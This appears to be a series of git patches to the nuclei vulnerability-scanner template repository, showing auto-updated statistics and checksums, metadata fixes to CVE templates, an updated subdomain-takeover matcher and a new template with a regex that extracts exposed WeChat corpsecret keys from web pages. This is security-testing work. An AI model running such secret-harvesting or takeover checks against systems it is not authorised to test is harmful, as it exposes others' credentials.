| +| fusion | 1 | | | | | | | | | +| moonpay | 1 | | | | | | | | | +| message-me | 1 | | | | | | | | | +| tellonym | 1 | | | | | | | | | +| microcomputers | 1 | | | | | | | | | +| sensu | 1 | | | | | | | | | +| karma | 1 | | | | | | | | | +| stackhawk | 1 | | | | | | | | | +| linktap | 1 | | | | | | | | | +| lorsh-mastodon-instance | 1 | | | | | | | | | +| encompass | 1 | | | | | | | | | +| dapp | 1 | | | | | | | | | +| pluginops | 1 | | | | | | | | | +| 'updraftplus' | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| somansa | 1 | | | | | | | | | +| elasticpot | 1 | | | | | | | | | +| isams | 1 | | | | | | | | | +| greenbone | 1 | | | | | | | | | +| parse | 1 | | | | | | | | | +| pelco | 1 | | | | | | | | | +| lua | 1 | | | | | | | | | +| web-dorado | 1 | | | | | | | | | +| mediation | 1 | | | | | | | | | +| n-central | 1 | | | | | | | | | +| enrollment_system_project | 1 | | | | | | | | | +| clustering | 1 | | | | | | | | | +| affiliates-manager | 1 | | | | | | | | | +| planetestream | 1 | | | | | | | | | +| gpc | 1 | | | | | | | | | +| dynamic | 1 | | | | | | | | | +| pivotal_software | 1 | | | | | | | | | +| redux | 1 | | | | | | | | | +| pauple | 1 | | | | | | | | | +| vfs | 1 | | | | | | | | | +| vistaweb | 1 | | | | | | | | | +| markdown | 1 | | | | | | | | | +| paysyspro | 1 | | | | | | | | | +| h2c | 1 | | | | | | | | | +| accessally | 1 | | | | | | | | | +| senayan | 1 | | | | | | | | | +| topacm | 1 | | | | | | | | | +| bouqueteditor_project | 1 | | | | | | | | | +| modx | 1 | | | | | | | | | +| querysol | 1 | | | | | | | | | +| ilch | 1 | | | | | | | | | +| paramountplus | 1 | | | | | | | | | +| roundcube | 1 | | | | | | | | | +| behat | 1 | | | | | | | | | +| vcloud | 1 | | | | | | | | | +| pornhub-porn-stars | 1 | | | | | | | | | +| helprace | 1 | | | | | | | | | +| knowage | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index a06f58e212..07d5a58d8b 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | -| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | -| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | -| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | -| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | -| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | -| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | +| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | +| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | +| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | +| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | +| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | +| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 57 | | | | | +| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | From 71452a2beec598109141d7b60e98e323f8370f3e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 15:03:59 +0000 Subject: [PATCH 191/847] Auto README Update [Thu May 23 15:03:59 UTC 2024] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 61f5f3b16e..cdd58890f5 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | -| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | -| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | -| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | -| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | -| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | -| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | +| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | +| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | +| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | +| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | +| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | +| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 57 | | | | | +| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | -**638 directories, 8694 files**. +**640 directories, 8753 files**. From 8d1217686852b907d8cedb1cf29d4805109be224 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 23 May 2024 11:16:49 -0500 Subject: [PATCH 192/847] Update flexbe-takeover.yaml The error message changed as seen here: https://lp328626.myflexbe.com/ --- http/takeovers/flexbe-takeover.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index 3abeffd414..216b1c828f 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -26,10 +26,10 @@ http: - type: word condition: and words: - - "Domain isn't configured" - - "flexbe" + - "Domain not configured" + - "flexbe.com" - type: status status: - 404 -# digest: 4a0a00473045022100b0eb04edf08bb3be7f7019dc369fb2ce05a757eba9f8b0c43ad2ba6a99ce74a40220530f5f0dd9ad2ff3de1282b65b91678c0e2b2056086e1bcbae94064711075b51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0eb04edf08bb3be7f7019dc369fb2ce05a757eba9f8b0c43ad2ba6a99ce74a40220530f5f0dd9ad2ff3de1282b65b91678c0e2b2056086e1bcbae94064711075b51:922c64590222798bb761d5b6d8e72950 From af00205a070e2be566d3225505543bef7b8ce30b Mon Sep 17 00:00:00 2001 From: N0el4kLs <1332210141@qq.com> Date: Fri, 24 May 2024 01:22:25 +0800 Subject: [PATCH 193/847] create: wechat-secret-key.yaml --- .../tokens/wechat/wechat-secret-key.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 http/exposures/tokens/wechat/wechat-secret-key.yaml diff --git a/http/exposures/tokens/wechat/wechat-secret-key.yaml b/http/exposures/tokens/wechat/wechat-secret-key.yaml new file mode 100644 index 0000000000..33ab8f6644 --- /dev/null +++ b/http/exposures/tokens/wechat/wechat-secret-key.yaml @@ -0,0 +1,23 @@ +id: wechat-corpsecret-key + +info: + name: Enterprise WeChat Corpsecret Key + author: N0el4kls + severity: info + reference: + - https://xz.aliyun.com/t/11092 + metadata: + verified: true + max-request: 1 + tags: wechat,exposure,tencent + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)corpsecret\s*[:=]\s*["']?([a-z0-9\-]+)["']? \ No newline at end of file From c514ea02ced3bd66ad20c049afb4e7c56f0f6645 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Thu, 23 May 2024 23:01:12 +0530 Subject: [PATCH 194/847] Update CVE-2024-1061.yaml --- http/cves/2024/CVE-2024-1061.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index f0ddb1a479..aa0d05ef41 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -30,7 +30,7 @@ info: vendor: bplugins product: html5_video_player framework: wordpress - fofa-query: "\"wordpress\" && body=\"html5-video-player\"" + fofa-query: "wordpress" && body="html5-video-player" tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player http: @@ -45,4 +45,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "created_at", "video_id")' condition: and -# digest: 4a0a00473045022070156cf1af14d1844f0ca97c8ef395673a56630b05af2016c799cacc75015e6f022100961eeec2ecda1a713e896c60ec730e503954339759b3f64aacd2702e074bd745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022070156cf1af14d1844f0ca97c8ef395673a56630b05af2016c799cacc75015e6f022100961eeec2ecda1a713e896c60ec730e503954339759b3f64aacd2702e074bd745:922c64590222798bb761d5b6d8e72950 From 2ff93d30d7ec612d7614d7ea7dd2219baa2a68ed Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 23 May 2024 17:31:55 +0000 Subject: [PATCH 195/847] Auto Generated New Template Addition List [Thu May 23 17:31:55 UTC 2024] :robot: --- .new-additions | 62 -------------------------------------------------- 1 file changed, 62 deletions(-) diff --git a/.new-additions b/.new-additions index 74817b2587..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,62 +0,0 @@ -http/cnvd/2017/CNVD-2017-06001.yaml -http/cves/2023/CVE-2023-29827.yaml -http/cves/2023/CVE-2023-35158.yaml -http/cves/2023/CVE-2023-36284.yaml -http/cves/2023/CVE-2023-36347.yaml -http/cves/2023/CVE-2023-43374.yaml -http/cves/2023/CVE-2023-44813.yaml -http/cves/2023/CVE-2023-4542.yaml -http/cves/2023/CVE-2023-45855.yaml -http/cves/2023/CVE-2023-5991.yaml -http/cves/2023/CVE-2023-6065.yaml -http/cves/2024/CVE-2024-0195.yaml -http/cves/2024/CVE-2024-0200.yaml -http/cves/2024/CVE-2024-1561.yaml -http/cves/2024/CVE-2024-3097.yaml -http/cves/2024/CVE-2024-33288.yaml -http/cves/2024/CVE-2024-4956.yaml -http/default-logins/softether/softether-vpn-default-login.yaml -http/exposed-panels/ackee-panel.yaml -http/exposed-panels/craftercms-panel.yaml -http/exposed-panels/easyvista-panel.yaml -http/exposed-panels/fortinet/f5-next-central-manager.yaml -http/exposed-panels/ghost-panel.yaml -http/exposed-panels/matomo-panel.yaml -http/exposed-panels/microfocus-lifecycle-panel.yaml -http/exposed-panels/n8n-panel.yaml -http/exposed-panels/nocodb-panel.yaml -http/exposed-panels/oracle-ebusiness-panel.yaml -http/exposed-panels/pocketbase-panel.yaml -http/exposed-panels/qlikview-accesspoint-panel.yaml -http/exposed-panels/tiny-rss-panel.yaml -http/exposed-panels/unleash-panel.yaml -http/honeypot/tpot-honeypot-detect.yaml -http/misconfiguration/imgproxy-unauth.yaml -http/misconfiguration/installer/custom-xoops-installer.yaml -http/misconfiguration/installer/easy-viserlabs-installer.yaml -http/misconfiguration/installer/forgejo-installer.yaml -http/misconfiguration/installer/froxlor-installer.yaml -http/misconfiguration/installer/growi-installer.yaml -http/misconfiguration/installer/ids-skills-installer.yaml -http/misconfiguration/installer/moosocial-installer.yaml -http/misconfiguration/installer/octoprint-installer.yaml -http/misconfiguration/installer/openfire-setup.yaml -http/misconfiguration/installer/phpmyfaq-installer.yaml -http/misconfiguration/installer/qloapps-installer.yaml -http/misconfiguration/installer/trilium-notes-installer.yaml -http/misconfiguration/installer/wiki-js-installer.yaml -http/misconfiguration/installer/xbackbone-installer.yaml -http/misconfiguration/unigui-server-monitor-exposure.yaml -http/technologies/apache/apache-answer-detect.yaml -http/technologies/boa-web-server.yaml -http/technologies/craftercms-detect.yaml -http/technologies/imgproxy-detect.yaml -http/technologies/meilisearch-detect.yaml -http/technologies/microfocus-iprint-detect.yaml -http/technologies/statamic-detect.yaml -http/technologies/tinyproxy-detect.yaml -http/technologies/uni-gui-framework.yaml -http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml -http/vulnerabilities/other/castel-digital-sqli.yaml -http/vulnerabilities/other/tendat-credential.yaml -javascript/enumeration/checkpoint-firewall-enum.yaml From 77749f0bf7957b89822ba58a3f448c510c032ad4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 17:32:00 +0000 Subject: [PATCH 196/847] Auto Generated Templates Checksum [Thu May 23 17:32:00 UTC 2024] :robot: --- templates-checksum.txt | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ccc9a418c4..5b3a981cb1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:6c60460e1b0f948b5ee382edcedf044ba5aff856 +README.md:09d062de57bad60db1e4dd1b9bca44e9aec54885 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:f43402ca0284acc690f4d239afd477488d220182 -TEMPLATES-STATS.md:7d758b52f7d1c73e19018bddb902f0076bd4a867 -TOP-10.md:3e73524df2b18729f1e3def717dac5e973708c14 +TEMPLATES-STATS.json:7a8b19dcd47380dc5946c94d97eccf2a9de82838 +TEMPLATES-STATS.md:ca8a2904a0b1c9b675bd03d9876539ec3293977f +TOP-10.md:8521fdfb4307347b855a19fcd895ab3608ffc444 cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f cloud/aws/acm/acm-cert-renewal-30days.yaml:a90f78e355c103211f113d112ced769e7a0297a2 cloud/aws/acm/acm-cert-renewal-45days.yaml:31dd523c386a3e2fce9e6882f0bd6eadcb5d9527 @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:5cc15bbdbdf77cdc98f62333d1674a451ef23c76 -cves.json-checksum.txt:eaeeca8d28a10d9264e42d57757cbb121db0aada +cves.json:cfc088634ae45324a8da7ad24935ca652af56005 +cves.json-checksum.txt:736f1e493b97aa3ed9087475630076e22ea04456 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3236,7 +3236,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac -http/cves/2024/CVE-2024-0195.yaml:eb8732fdcf909e648fe0b0b7b5034baef8fba762 +http/cves/2024/CVE-2024-0195.yaml:8e306f17c007cae746c4d60abb6b6ee5e6189485 http/cves/2024/CVE-2024-0200.yaml:b56dea46f7628a62b55f121e4d4ca7716460590f http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe @@ -3246,7 +3246,7 @@ http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8 http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7 -http/cves/2024/CVE-2024-1061.yaml:86d3c132707db27f265ffc55e9a5897dd6b03fd0 +http/cves/2024/CVE-2024-1061.yaml:3ca4c2f35a403c5067ef7b8795b307417436fa4f http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c http/cves/2024/CVE-2024-1183.yaml:13a0cbff374005b467ac0b663f895021b5d981a8 http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 @@ -8558,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:04b59522b13a9ae897489138806ed87daab73c4c +templates-checksum.txt:f76730f65e4d627ae142d78aa0957f81a49e38f7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 45e007dd70ada238ed0ebdb18104c38cff21d43a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 23 May 2024 17:32:42 +0000 Subject: [PATCH 197/847] Syncing Templates --- .github/workflows/templates-sync.yml | 62 ---------------------------- 1 file changed, 62 deletions(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9c8c56ad1a..37f01c16d6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,68 +3,6 @@ on: push: paths: - '.new-additions' - - 'http/cnvd/2017/CNVD-2017-06001.yaml' - - 'http/cves/2023/CVE-2023-29827.yaml' - - 'http/cves/2023/CVE-2023-35158.yaml' - - 'http/cves/2023/CVE-2023-36284.yaml' - - 'http/cves/2023/CVE-2023-36347.yaml' - - 'http/cves/2023/CVE-2023-43374.yaml' - - 'http/cves/2023/CVE-2023-44813.yaml' - - 'http/cves/2023/CVE-2023-4542.yaml' - - 'http/cves/2023/CVE-2023-45855.yaml' - - 'http/cves/2023/CVE-2023-5991.yaml' - - 'http/cves/2023/CVE-2023-6065.yaml' - - 'http/cves/2024/CVE-2024-0195.yaml' - - 'http/cves/2024/CVE-2024-0200.yaml' - - 'http/cves/2024/CVE-2024-1561.yaml' - - 'http/cves/2024/CVE-2024-3097.yaml' - - 'http/cves/2024/CVE-2024-33288.yaml' - - 'http/cves/2024/CVE-2024-4956.yaml' - - 'http/default-logins/softether/softether-vpn-default-login.yaml' - - 'http/exposed-panels/ackee-panel.yaml' - - 'http/exposed-panels/craftercms-panel.yaml' - - 'http/exposed-panels/easyvista-panel.yaml' - - 'http/exposed-panels/fortinet/f5-next-central-manager.yaml' - - 'http/exposed-panels/ghost-panel.yaml' - - 'http/exposed-panels/matomo-panel.yaml' - - 'http/exposed-panels/microfocus-lifecycle-panel.yaml' - - 'http/exposed-panels/n8n-panel.yaml' - - 'http/exposed-panels/nocodb-panel.yaml' - - 'http/exposed-panels/oracle-ebusiness-panel.yaml' - - 'http/exposed-panels/pocketbase-panel.yaml' - - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - - 'http/exposed-panels/tiny-rss-panel.yaml' - - 'http/exposed-panels/unleash-panel.yaml' - - 'http/honeypot/tpot-honeypot-detect.yaml' - - 'http/misconfiguration/imgproxy-unauth.yaml' - - 'http/misconfiguration/installer/custom-xoops-installer.yaml' - - 'http/misconfiguration/installer/easy-viserlabs-installer.yaml' - - 'http/misconfiguration/installer/forgejo-installer.yaml' - - 'http/misconfiguration/installer/froxlor-installer.yaml' - - 'http/misconfiguration/installer/growi-installer.yaml' - - 'http/misconfiguration/installer/ids-skills-installer.yaml' - - 'http/misconfiguration/installer/moosocial-installer.yaml' - - 'http/misconfiguration/installer/octoprint-installer.yaml' - - 'http/misconfiguration/installer/openfire-setup.yaml' - - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - - 'http/misconfiguration/installer/qloapps-installer.yaml' - - 'http/misconfiguration/installer/trilium-notes-installer.yaml' - - 'http/misconfiguration/installer/wiki-js-installer.yaml' - - 'http/misconfiguration/installer/xbackbone-installer.yaml' - - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - - 'http/technologies/apache/apache-answer-detect.yaml' - - 'http/technologies/boa-web-server.yaml' - - 'http/technologies/craftercms-detect.yaml' - - 'http/technologies/imgproxy-detect.yaml' - - 'http/technologies/meilisearch-detect.yaml' - - 'http/technologies/microfocus-iprint-detect.yaml' - - 'http/technologies/statamic-detect.yaml' - - 'http/technologies/tinyproxy-detect.yaml' - - 'http/technologies/uni-gui-framework.yaml' - - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' - - 'http/vulnerabilities/other/castel-digital-sqli.yaml' - - 'http/vulnerabilities/other/tendat-credential.yaml' - - 'javascript/enumeration/checkpoint-firewall-enum.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 63364a86972e1e62ac8e895aca963bcae3cd2285 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Fri, 24 May 2024 03:00:30 +0530 Subject: [PATCH 198/847] Update CVE-2022-41473.yaml --- http/cves/2022/CVE-2022-41473.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 487d6d487a..9b99471bec 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -27,10 +27,10 @@ info: metadata: verified: true max-request: 1 - vendor: 'rpcms' - product: 'rpcms' + vendor: rpcms + product: rpcms shodan-query: http.html:"RPCMS" - tags: cve,cve2022,rpcms,xss,'rpcms' + tags: cve,cve2022,rpcms,xss,rpcms http: - method: GET @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950 From 0226a3d8a92bd9817963239b2ff77119cc674265 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:31:50 +0000 Subject: [PATCH 200/847] Auto Generated Templates Checksum [Thu May 23 21:31:50 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5b3a981cb1..111cbede54 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2792,7 +2792,7 @@ http/cves/2022/CVE-2022-4117.yaml:1e44f0c7ce464548cf7a8ff5c714866891b81a12 http/cves/2022/CVE-2022-4140.yaml:f243423772b8b2e9cfb6a9a3d8e4bbbbab68b2c9 http/cves/2022/CVE-2022-41412.yaml:897d78be653f3c09f28e027006285ca2dfd67d8d http/cves/2022/CVE-2022-41441.yaml:53548507ba14aae755885a74642e9df3ac4b35e7 -http/cves/2022/CVE-2022-41473.yaml:d01744a230fae1f94045d8821eceab99821f1b0a +http/cves/2022/CVE-2022-41473.yaml:3494e5c8590cb8ef169e2973afbf8deff741d211 http/cves/2022/CVE-2022-41840.yaml:a55753333818330dd5ac198655530d2755a3a239 http/cves/2022/CVE-2022-42094.yaml:22cbf742c665310adc7ced1dd3f87664b96b4115 http/cves/2022/CVE-2022-42095.yaml:2a39087a4ed951945354f872a56e60599e8c0441 @@ -8558,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f76730f65e4d627ae142d78aa0957f81a49e38f7 +templates-checksum.txt:6420a1252dee0cec7f0bc324c0be825086313c5e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a4eeec20688840987af6c31bd9f4c3c2861dfe43 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Fri, 24 May 2024 03:02:02 +0530 Subject: [PATCH 201/847] Update CVE-2022-0864.yaml --- http/cves/2022/CVE-2022-0864.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 7677e5849e..8ee0a1a01f 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -26,10 +26,10 @@ info: metadata: verified: true max-request: 2 - vendor: 'updraftplus' - product: 'updraftplus' + vendor: updraftplus + product: updraftplus framework: wordpress - tags: cve,cve2022,xss,authenticated,updraftplus,wpscan,wp-plugin,wp,wordpress,'updraftplus' + tags: cve,cve2022,xss,authenticated,updraftplus,wpscan,wp-plugin,wp,wordpress,updraftplus http: - raw: @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022034be4400ddd11bead7863e54de04f23d1c17f928aef2720f6a7c9b4d234581b2022001f7f119d81ac51ef899efc1106ad966682323a96b57947df36030ff8300e7d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034be4400ddd11bead7863e54de04f23d1c17f928aef2720f6a7c9b4d234581b2022001f7f119d81ac51ef899efc1106ad966682323a96b57947df36030ff8300e7d5:922c64590222798bb761d5b6d8e72950 From 4030bd05c372762fb209390aa61f42ec2e76e6cd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:32:49 +0000 Subject: [PATCH 203/847] Auto Generated Templates Checksum [Thu May 23 21:32:49 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 111cbede54..0f2f691cf8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2467,7 +2467,7 @@ http/cves/2022/CVE-2022-0824.yaml:834df363f2d408a096b0e7c39a96f875659e99df http/cves/2022/CVE-2022-0826.yaml:c968716c056d8bac29c828f6de28d91fe05c9131 http/cves/2022/CVE-2022-0827.yaml:08336164d26872a6cc676046ef7a1e26af4d1d30 http/cves/2022/CVE-2022-0846.yaml:f79dd734e1a26b052d0e36f9492518e49c90678c -http/cves/2022/CVE-2022-0864.yaml:6498b656c91969541eb6dfd33c23a44273abf196 +http/cves/2022/CVE-2022-0864.yaml:1a6baf788487f6ebf716823b6c3191ef8da02348 http/cves/2022/CVE-2022-0867.yaml:6e863875d948eb2710e1bd9f80b30a8a4a84e1ce http/cves/2022/CVE-2022-0869.yaml:eac3f6cb08a6fde39633b57380547f077d31f125 http/cves/2022/CVE-2022-0870.yaml:50d1fffb2a551f946af8743ee205f95504659338 @@ -8558,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6420a1252dee0cec7f0bc324c0be825086313c5e +templates-checksum.txt:1045900bb85fc3bb0daae2fa73e5aefe3e652e8f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 